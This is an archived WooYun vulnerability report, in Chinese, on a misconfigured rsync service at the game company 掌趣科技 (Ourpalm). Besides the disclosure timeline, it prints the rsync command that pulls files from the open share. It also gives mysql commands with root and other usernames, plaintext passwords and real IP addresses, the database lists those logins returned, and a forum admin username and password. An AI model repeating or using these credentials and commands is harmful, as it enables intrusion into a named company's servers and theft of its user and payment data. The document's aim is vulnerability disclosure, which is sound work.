乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-11-20: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-01-04: 厂商已经主动忽略漏洞,细节向公众公开
掌趣科技 股票代码:300315掌趣科技系统配置不当导致大量数据库信息有被拖库危险
rsync 219.232.240.2::case
没有身份认证导致文件外泄,又从这些文件中找到如下数据库权限,数据库授权不严格,导致任意ip在有用户名密码情况下连接,且权利很高。
掌趣科技 mysql -uroot -pmysql228 -h219.232.240.6| analyze || android || bbs || cjsh_user || cms || dx || football || game_stat || game_stat_test || gcenter || gs || lt_wap || mis || mysql || ourpalm || ssfee_platform || ssfee_platform_test || test || test_channel || union || union_test || user || user_tmp || webpay || yjws || yjws-bak |mysql -uroot -pmysql35 -h114.66.192.86| android || backup || db_sp_gw || db_zq_gw || echarge || mobilecharge || mysql || paycenter || paycenter0708 || sms_coop || sms_coop2 || sms_coop_cz || sms_coop_xjoys || ssfee_platform || stat_fee_xjoys || stat_spservice || stat_ssfee_logs || test || webpay || webreport || webtest |mysql -uroot -pmysql228 -h124.248.32.246| analyze || bbs || bbs_new || bbs_test || cjsh_user || game_stat || gcenter || mysql || ssfee_platform || test || union || user || user_tmp || webpay || yjws | mysql -ustoneage -pourp@lm -h117.79.132.166| nagdb || stoneage || stoneage_18 |mysql -uwebgame -pmysql39 -h117.79.148.39| dedecmsv57utf8 || dedecmsv57utf8sp1 || game || gs0708 || mysql || portal_0708 || ultrax || user |mysql -uroot -pmysql242 -h219.232.244.242| bbs || cacti || derkhan || mysql || sanguo_vote || stat || test || webgame_center || webpay || webpay_test || xweibo |http://bbs.gamebean.comadmin:wanglirong
你们网管考虑换一批人吧,这个太弱了!
未能联系到厂商或者厂商积极拒绝